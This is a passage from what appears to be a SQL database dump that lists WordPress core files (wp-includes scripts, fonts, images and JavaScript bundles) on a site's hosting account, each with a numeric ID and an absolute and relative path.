ov/tummyrevolution.com/wp-includes/customize/class-wp-widget-area-customize-control.php','wp-includes/customize/class-wp-widget-area-customize-control.php'),(15556,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-widget-form-customize-control.php','wp-includes/customize/class-wp-widget-form-customize-control.php'),(15557,'/home/tummmyov/tummyrevolution.com/wp-includes/date.php','wp-includes/date.php'),(15558,'/home/tummmyov/tummyrevolution.com/wp-includes/default-constants.php','wp-includes/default-constants.php'),(15559,'/home/tummmyov/tummyrevolution.com/wp-includes/default-filters.php','wp-includes/default-filters.php'),(15560,'/home/tummmyov/tummyrevolution.com/wp-includes/default-widgets.php','wp-includes/default-widgets.php'),(15561,'/home/tummmyov/tummyrevolution.com/wp-includes/deprecated.php','wp-includes/deprecated.php'),(15562,'/home/tummmyov/tummyrevolution.com/wp-includes/embed-template.php','wp-includes/embed-template.php'),(15563,'/home/tummmyov/tummyrevolution.com/wp-includes/embed.php','wp-includes/embed.php'),(15564,'/home/tummmyov/tummyrevolution.com/wp-includes/error-protection.php','wp-includes/error-protection.php'),(15565,'/home/tummmyov/tummyrevolution.com/wp-includes/feed-atom-comments.php','wp-includes/feed-atom-comments.php'),(15566,'/home/tummmyov/tummyrevolution.com/wp-includes/feed-atom.php','wp-includes/feed-atom.php'),(15567,'/home/tummmyov/tummyrevolution.com/wp-includes/feed-rdf.php','wp-includes/feed-rdf.php'),(15568,'/home/tummmyov/tummyrevolution.com/wp-includes/feed-rss.php','wp-includes/feed-rss.php'),(15569,'/home/tummmyov/tummyrevolution.com/wp-includes/feed-rss2-comments.php','wp-includes/feed-rss2-comments.php'),(15570,'/home/tummmyov/tummyrevolution.com/wp-includes/feed-rss2.php','wp-includes/feed-rss2.php'),(15571,'/home/tummmyov/tummyrevolution.com/wp-includes/feed.php','wp-includes/feed.php'),(15572,'/home/tummmyov/tummyrevolution.com/wp-includes/fonts/class-wp-font-face-resolver.php','wp-includes/fonts/class-wp-font-face-resolver.php'),(15573,'/home/tummmyov/tummyrevolution.com/wp-includes/fonts/class-wp-font-face.php','wp-includes/fonts/class-wp-font-face.php'),(15574,'/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.eot','wp-includes/fonts/dashicons.eot'),(15575,'/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.svg','wp-includes/fonts/dashicons.svg'),(15576,'/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.ttf','wp-includes/fonts/dashicons.ttf'),(15577,'/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.woff','wp-includes/fonts/dashicons.woff'),(15578,'/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.woff2','wp-includes/fonts/dashicons.woff2'),(15579,'/home/tummmyov/tummyrevolution.com/wp-includes/fonts.php','wp-includes/fonts.php'),(15580,'/home/tummmyov/tummyrevolution.com/wp-includes/formatting.php','wp-includes/formatting.php'),(15581,'/home/tummmyov/tummyrevolution.com/wp-includes/functions.php','wp-includes/functions.php'),(15582,'/home/tummmyov/tummyrevolution.com/wp-includes/functions.wp-scripts.php','wp-includes/functions.wp-scripts.php'),(15583,'/home/tummmyov/tummyrevolution.com/wp-includes/functions.wp-styles.php','wp-includes/functions.wp-styles.php'),(15584,'/home/tummmyov/tummyrevolution.com/wp-includes/general-template.php','wp-includes/general-template.php'),(15585,'/home/tummmyov/tummyrevolution.com/wp-includes/global-styles-and-settings.php','wp-includes/global-styles-and-settings.php'),(15586,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-active-formatting-elements.php','wp-includes/html-api/class-wp-html-active-formatting-elements.php'),(15587,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-attribute-token.php','wp-includes/html-api/class-wp-html-attribute-token.php'),(15588,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-open-elements.php','wp-includes/html-api/class-wp-html-open-elements.php'),(15589,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-processor-state.php','wp-includes/html-api/class-wp-html-processor-state.php'),(15590,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-processor.php','wp-includes/html-api/class-wp-html-processor.php'),(15591,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-span.php','wp-includes/html-api/class-wp-html-span.php'),(15592,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-tag-processor.php','wp-includes/html-api/class-wp-html-tag-processor.php'),(15593,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-text-replacement.php','wp-includes/html-api/class-wp-html-text-replacement.php'),(15594,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-token.php','wp-includes/html-api/class-wp-html-token.php'),(15595,'/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-unsupported-exception.php','wp-includes/html-api/class-wp-html-unsupported-exception.php'),(15596,'/home/tummmyov/tummyrevolution.com/wp-includes/http.php','wp-includes/http.php'),(15597,'/home/tummmyov/tummyrevolution.com/wp-includes/https-detection.php','wp-includes/https-detection.php'),(15598,'/home/tummmyov/tummyrevolution.com/wp-includes/https-migration.php','wp-includes/https-migration.php'),(15599,'/home/tummmyov/tummyrevolution.com/wp-includes/images/admin-bar-sprite-2x.png','wp-includes/images/admin-bar-sprite-2x.png'),(15600,'/home/tummmyov/tummyrevolution.com/wp-includes/images/admin-bar-sprite.png','wp-includes/images/admin-bar-sprite.png'),(15601,'/home/tummmyov/tummyrevolution.com/wp-includes/images/arrow-pointer-blue-2x.png','wp-includes/images/arrow-pointer-blue-2x.png'),(15602,'/home/tummmyov/tummyrevolution.com/wp-includes/images/arrow-pointer-blue.png','wp-includes/images/arrow-pointer-blue.png'),(15603,'/home/tummmyov/tummyrevolution.com/wp-includes/images/blank.gif','wp-includes/images/blank.gif'),(15604,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/archive.png','wp-includes/images/crystal/archive.png'),(15605,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/audio.png','wp-includes/images/crystal/audio.png'),(15606,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/code.png','wp-includes/images/crystal/code.png'),(15607,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/default.png','wp-includes/images/crystal/default.png'),(15608,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/document.png','wp-includes/images/crystal/document.png'),(15609,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/interactive.png','wp-includes/images/crystal/interactive.png'),(15610,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/license.txt','wp-includes/images/crystal/license.txt'),(15611,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/spreadsheet.png','wp-includes/images/crystal/spreadsheet.png'),(15612,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/text.png','wp-includes/images/crystal/text.png'),(15613,'/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/video.png','wp-includes/images/crystal/video.png'),(15614,'/home/tummmyov/tummyrevolution.com/wp-includes/images/down_arrow-2x.gif','wp-includes/images/down_arrow-2x.gif'),(15615,'/home/tummmyov/tummyrevolution.com/wp-includes/images/down_arrow.gif','wp-includes/images/down_arrow.gif'),(15616,'/home/tummmyov/tummyrevolution.com/wp-includes/images/icon-pointer-flag-2x.png','wp-includes/images/icon-pointer-flag-2x.png'),(15617,'/home/tummmyov/tummyrevolution.com/wp-includes/images/icon-pointer-flag.png','wp-includes/images/icon-pointer-flag.png'),(15618,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/archive.png','wp-includes/images/media/archive.png'),(15619,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/audio.png','wp-includes/images/media/audio.png'),(15620,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/code.png','wp-includes/images/media/code.png'),(15621,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/default.png','wp-includes/images/media/default.png'),(15622,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/document.png','wp-includes/images/media/document.png'),(15623,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/interactive.png','wp-includes/images/media/interactive.png'),(15624,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/spreadsheet.png','wp-includes/images/media/spreadsheet.png'),(15625,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/text.png','wp-includes/images/media/text.png'),(15626,'/home/tummmyov/tummyrevolution.com/wp-includes/images/media/video.png','wp-includes/images/media/video.png'),(15627,'/home/tummmyov/tummyrevolution.com/wp-includes/images/rss-2x.png','wp-includes/images/rss-2x.png'),(15628,'/home/tummmyov/tummyrevolution.com/wp-includes/images/rss.png','wp-includes/images/rss.png'),(15629,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/frownie.png','wp-includes/images/smilies/frownie.png'),(15630,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_arrow.gif','wp-includes/images/smilies/icon_arrow.gif'),(15631,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_biggrin.gif','wp-includes/images/smilies/icon_biggrin.gif'),(15632,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_confused.gif','wp-includes/images/smilies/icon_confused.gif'),(15633,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_cool.gif','wp-includes/images/smilies/icon_cool.gif'),(15634,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_cry.gif','wp-includes/images/smilies/icon_cry.gif'),(15635,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_eek.gif','wp-includes/images/smilies/icon_eek.gif'),(15636,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_evil.gif','wp-includes/images/smilies/icon_evil.gif'),(15637,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_exclaim.gif','wp-includes/images/smilies/icon_exclaim.gif'),(15638,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_idea.gif','wp-includes/images/smilies/icon_idea.gif'),(15639,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_lol.gif','wp-includes/images/smilies/icon_lol.gif'),(15640,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_mad.gif','wp-includes/images/smilies/icon_mad.gif'),(15641,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_mrgreen.gif','wp-includes/images/smilies/icon_mrgreen.gif'),(15642,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_neutral.gif','wp-includes/images/smilies/icon_neutral.gif'),(15643,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_question.gif','wp-includes/images/smilies/icon_question.gif'),(15644,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_razz.gif','wp-includes/images/smilies/icon_razz.gif'),(15645,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_redface.gif','wp-includes/images/smilies/icon_redface.gif'),(15646,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_rolleyes.gif','wp-includes/images/smilies/icon_rolleyes.gif'),(15647,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_sad.gif','wp-includes/images/smilies/icon_sad.gif'),(15648,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_smile.gif','wp-includes/images/smilies/icon_smile.gif'),(15649,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_surprised.gif','wp-includes/images/smilies/icon_surprised.gif'),(15650,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_twisted.gif','wp-includes/images/smilies/icon_twisted.gif'),(15651,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_wink.gif','wp-includes/images/smilies/icon_wink.gif'),(15652,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/mrgreen.png','wp-includes/images/smilies/mrgreen.png'),(15653,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/rolleyes.png','wp-includes/images/smilies/rolleyes.png'),(15654,'/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/simple-smile.png','wp-includes/images/smilies/simple-smile.png'),(15655,'/home/tummmyov/tummyrevolution.com/wp-includes/images/spinner-2x.gif','wp-includes/images/spinner-2x.gif'),(15656,'/home/tummmyov/tummyrevolution.com/wp-includes/images/spinner.gif','wp-includes/images/spinner.gif'),(15657,'/home/tummmyov/tummyrevolution.com/wp-includes/images/toggle-arrow-2x.png','wp-includes/images/toggle-arrow-2x.png'),(15658,'/home/tummmyov/tummyrevolution.com/wp-includes/images/toggle-arrow.png','wp-includes/images/toggle-arrow.png'),(15659,'/home/tummmyov/tummyrevolution.com/wp-includes/images/uploader-icons-2x.png','wp-includes/images/uploader-icons-2x.png'),(15660,'/home/tummmyov/tummyrevolution.com/wp-includes/images/uploader-icons.png','wp-includes/images/uploader-icons.png'),(15661,'/home/tummmyov/tummyrevolution.com/wp-includes/images/w-logo-blue-white-bg.png','wp-includes/images/w-logo-blue-white-bg.png'),(15662,'/home/tummmyov/tummyrevolution.com/wp-includes/images/w-logo-blue.png','wp-includes/images/w-logo-blue.png'),(15663,'/home/tummmyov/tummyrevolution.com/wp-includes/images/wpicons-2x.png','wp-includes/images/wpicons-2x.png'),(15664,'/home/tummmyov/tummyrevolution.com/wp-includes/images/wpicons.png','wp-includes/images/wpicons.png'),(15665,'/home/tummmyov/tummyrevolution.com/wp-includes/images/wpspin-2x.gif','wp-includes/images/wpspin-2x.gif'),(15666,'/home/tummmyov/tummyrevolution.com/wp-includes/images/wpspin.gif','wp-includes/images/wpspin.gif'),(15667,'/home/tummmyov/tummyrevolution.com/wp-includes/images/xit-2x.gif','wp-includes/images/xit-2x.gif'),(15668,'/home/tummmyov/tummyrevolution.com/wp-includes/images/xit.gif','wp-includes/images/xit.gif'),(15669,'/home/tummmyov/tummyrevolution.com/wp-includes/index.htm','wp-includes/index.htm'),(15670,'/home/tummmyov/tummyrevolution.com/wp-includes/index.html','wp-includes/index.html'),(15671,'/home/tummmyov/tummyrevolution.com/wp-includes/index.php','wp-includes/index.php'),(15672,'/home/tummmyov/tummyrevolution.com/wp-includes/js/admin-bar.js','wp-includes/js/admin-bar.js'),(15673,'/home/tummmyov/tummyrevolution.com/wp-includes/js/admin-bar.min.js','wp-includes/js/admin-bar.min.js'),(15674,'/home/tummmyov/tummyrevolution.com/wp-includes/js/api-request.js','wp-includes/js/api-request.js'),(15675,'/home/tummmyov/tummyrevolution.com/wp-includes/js/api-request.min.js','wp-includes/js/api-request.min.js'),(15676,'/home/tummmyov/tummyrevolution.com/wp-includes/js/autosave.js','wp-includes/js/autosave.js'),(15677,'/home/tummmyov/tummyrevolution.com/wp-includes/js/autosave.min.js','wp-includes/js/autosave.min.js'),(15678,'/home/tummmyov/tummyrevolution.com/wp-includes/js/backbone.js','wp-includes/js/backbone.js'),(15679,'/home/tummmyov/tummyrevolution.com/wp-includes/js/backbone.min.js','wp-includes/js/backbone.min.js'),(15680,'/home/tummmyov/tummyrevolution.com/wp-includes/js/clipboard.js','wp-includes/js/clipboard.js'),(15681,'/home/tummmyov/tummyrevolution.com/wp-includes/js/clipboard.min.js','wp-includes/js/clipboard.min.js'),(15682,'/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/codemirror.min.css','wp-includes/js/codemirror/codemirror.min.css'),(15683,'/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/codemirror.min.js','wp-includes/js/codemirror/codemirror.min.js'),(15684,'/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/csslint.js','wp-includes/js/codemirror/csslint.js'),(15685,'/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/esprima.js','wp-includes/js/codemirror/esprima.js'),(15686,'/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/fakejshint.js','wp-includes/js/codemirror/fakejshint.js'),(15687,'/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/htmlhint-kses.js','wp-includes/js/codemirror/htmlhint-kses.js'),(15688,'/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/htmlhint.js','wp-includes/js/codemirror/htmlhint.js'),(15689,'/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/jsonlint.js','wp-includes/js/codemirror/jsonlint.js'),(15690,'/home/tummmyov/tummyrevolution.com/wp-includes/js/colorpicker.js','wp-includes/js/colorpicker.js'),(15691,'/home/tummmyov/tummyrevolution.com/wp-includes/js/colorpicker.min.js','wp-includes/js/colorpicker.min.js'),(15692,'/home/tummmyov/tummyrevolution.com/wp-includes/js/comment-reply.js','wp-includes/js/comment-reply.js'),(15693,'/home/tummmyov/tummyrevolution.com/wp-includes/js/comment-reply.min.js','wp-includes/js/comment-reply.min.js'),(15694,'/home/tummmyov/tummyrevolution.com/wp-includes/js/crop/cropper.css','wp-includes/js/crop/cropper.css'),(15695,'/home/tummmyov/tummyrevolution.com/wp-includes/js/crop/cropper.js','wp-includes/js/crop/cropper.js'),(15696,'/home/tummmyov/tummyrevolution.com/wp-includes/js/crop/marqueeHoriz.gif','wp-includes/js/crop/marqueeHoriz.gif'),(15697,'/home/tummmyov/tummyrevolution.com/wp-includes/js/crop/marqueeVert.gif','wp-includes/js/crop/marqueeVert.gif'),(15698,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-base.js','wp-includes/js/customize-base.js'),(15699,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-base.min.js','wp-includes/js/customize-base.min.js'),(15700,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-loader.js','wp-includes/js/customize-loader.js'),(15701,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-loader.min.js','wp-includes/js/customize-loader.min.js'),(15702,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-models.js','wp-includes/js/customize-models.js'),(15703,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-models.min.js','wp-includes/js/customize-models.min.js'),(15704,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview-nav-menus.js','wp-includes/js/customize-preview-nav-menus.js'),(15705,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview-nav-menus.min.js','wp-includes/js/customize-preview-nav-menus.min.js'),(15706,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview-widgets.js','wp-includes/js/customize-preview-widgets.js'),(15707,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview-widgets.min.js','wp-includes/js/customize-preview-widgets.min.js'),(15708,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview.js','wp-includes/js/customize-preview.js'),(15709,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview.min.js','wp-includes/js/customize-preview.min.js'),(15710,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-selective-refresh.js','wp-includes/js/customize-selective-refresh.js'),(15711,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-selective-refresh.min.js','wp-includes/js/customize-selective-refresh.min.js'),(15712,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-views.js','wp-includes/js/customize-views.js'),(15713,'/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-views.min.js','wp-includes/js/customize-views.min.js'),(15714,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/a11y.js','wp-includes/js/dist/a11y.js'),(15715,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/a11y.min.js','wp-includes/js/dist/a11y.min.js'),(15716,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/annotations.js','wp-includes/js/dist/annotations.js'),(15717,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/annotations.min.js','wp-includes/js/dist/annotations.min.js'),(15718,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/api-fetch.js','wp-includes/js/dist/api-fetch.js'),(15719,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/api-fetch.min.js','wp-includes/js/dist/api-fetch.min.js'),(15720,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/autop.js','wp-includes/js/dist/autop.js'),(15721,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/autop.min.js','wp-includes/js/dist/autop.min.js'),(15722,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/blob.js','wp-includes/js/dist/blob.js'),(15723,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/blob.min.js','wp-includes/js/dist/blob.min.js'),(15724,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-directory.js','wp-includes/js/dist/block-directory.js'),(15725,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-directory.min.js','wp-includes/js/dist/block-directory.min.js'),(15726,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-editor.js','wp-includes/js/dist/block-editor.js'),(15727,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-editor.min.js','wp-includes/js/dist/block-editor.min.js'),(15728,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-library.js','wp-includes/js/dist/block-library.js'),(15729,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-library.min.js','wp-includes/js/dist/block-library.min.js'),(15730,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-serialization-default-parser.js','wp-includes/js/dist/block-serialization-default-parser.js'),(15731,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-serialization-default-parser.min.js','wp-includes/js/dist/block-serialization-default-parser.min.js'),(15732,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/blocks.js','wp-includes/js/dist/blocks.js'),(15733,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/blocks.min.js','wp-includes/js/dist/blocks.min.js'),(15734,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/commands.js','wp-includes/js/dist/commands.js'),(15735,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/commands.min.js','wp-includes/js/dist/commands.min.js'),(15736,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/components.js','wp-includes/js/dist/components.js'),(15737,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/components.min.js','wp-includes/js/dist/components.min.js'),(15738,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/compose.js','wp-includes/js/dist/compose.js'),(15739,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/compose.min.js','wp-includes/js/dist/compose.min.js'),(15740,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/core-commands.js','wp-includes/js/dist/core-commands.js'),(15741,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/core-commands.min.js','wp-includes/js/dist/core-commands.min.js'),(15742,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/core-data.js','wp-includes/js/dist/core-data.js'),(15743,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/core-data.min.js','wp-includes/js/dist/core-data.min.js'),(15744,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/customize-widgets.js','wp-includes/js/dist/customize-widgets.js'),(15745,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/customize-widgets.min.js','wp-includes/js/dist/customize-widgets.min.js'),(15746,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/data-controls.js','wp-includes/js/dist/data-controls.js'),(15747,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/data-controls.min.js','wp-includes/js/dist/data-controls.min.js'),(15748,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/data.js','wp-includes/js/dist/data.js'),(15749,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/data.min.js','wp-includes/js/dist/data.min.js'),(15750,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/date.js','wp-includes/js/dist/date.js'),(15751,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/date.min.js','wp-includes/js/dist/date.min.js'),(15752,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/deprecated.js','wp-includes/js/dist/deprecated.js'),(15753,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/deprecated.min.js','wp-includes/js/dist/deprecated.min.js'),(15754,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/development/react-refresh-entry.js','wp-includes/js/dist/development/react-refresh-entry.js'),(15755,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/development/react-refresh-entry.min.js','wp-includes/js/dist/development/react-refresh-entry.min.js'),(15756,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/development/react-refresh-runtime.js','wp-includes/js/dist/development/react-refresh-runtime.js'),(15757,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/development/react-refresh-runtime.min.js','wp-includes/js/dist/development/react-refresh-runtime.min.js'),(15758,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/dom-ready.js','wp-includes/js/dist/dom-ready.js'),(15759,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/dom-ready.min.js','wp-includes/js/dist/dom-ready.min.js'),(15760,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/dom.js','wp-includes/js/dist/dom.js'),(15761,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/dom.min.js','wp-includes/js/dist/dom.min.js'),(15762,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-post.js','wp-includes/js/dist/edit-post.js'),(15763,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-post.min.js','wp-includes/js/dist/edit-post.min.js'),(15764,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-site.js','wp-includes/js/dist/edit-site.js'),(15765,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-site.min.js','wp-includes/js/dist/edit-site.min.js'),(15766,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-widgets.js','wp-includes/js/dist/edit-widgets.js'),(15767,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-widgets.min.js','wp-includes/js/dist/edit-widgets.min.js'),(15768,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/editor.js','wp-includes/js/dist/editor.js'),(15769,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/editor.min.js','wp-includes/js/dist/editor.min.js'),(15770,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/element.js','wp-includes/js/dist/element.js'),(15771,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/element.min.js','wp-includes/js/dist/element.min.js'),(15772,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/escape-html.js','wp-includes/js/dist/escape-html.js'),(15773,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/escape-html.min.js','wp-includes/js/dist/escape-html.min.js'),(15774,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/format-library.js','wp-includes/js/dist/format-library.js'),(15775,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/format-library.min.js','wp-includes/js/dist/format-library.min.js'),(15776,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/hooks.js','wp-includes/js/dist/hooks.js'),(15777,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/hooks.min.js','wp-includes/js/dist/hooks.min.js'),(15778,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/html-entities.js','wp-includes/js/dist/html-entities.js'),(15779,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/html-entities.min.js','wp-includes/js/dist/html-entities.min.js'),(15780,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/i18n.js','wp-includes/js/dist/i18n.js'),(15781,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/i18n.min.js','wp-includes/js/dist/i18n.min.js'),(15782,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/interactivity.js','wp-includes/js/dist/interactivity.js'),(15783,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/interactivity.min.js','wp-includes/js/dist/interactivity.min.js'),(15784,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/is-shallow-equal.js','wp-includes/js/dist/is-shallow-equal.js'),(15785,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/is-shallow-equal.min.js','wp-includes/js/dist/is-shallow-equal.min.js'),(15786,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/keyboard-shortcuts.js','wp-includes/js/dist/keyboard-shortcuts.js'),(15787,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/keyboard-shortcuts.min.js','wp-includes/js/dist/keyboard-shortcuts.min.js'),(15788,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/keycodes.js','wp-includes/js/dist/keycodes.js'),(15789,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/keycodes.min.js','wp-includes/js/dist/keycodes.min.js'),(15790,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/list-reusable-blocks.js','wp-includes/js/dist/list-reusable-blocks.js'),(15791,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/list-reusable-blocks.min.js','wp-includes/js/dist/list-reusable-blocks.min.js'),(15792,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/media-utils.js','wp-includes/js/dist/media-utils.js'),(15793,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/media-utils.min.js','wp-includes/js/dist/media-utils.min.js'),(15794,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/notices.js','wp-includes/js/dist/notices.js'),(15795,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/notices.min.js','wp-includes/js/dist/notices.min.js'),(15796,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/nux.js','wp-includes/js/dist/nux.js'),(15797,'/home/tummmyov/tumm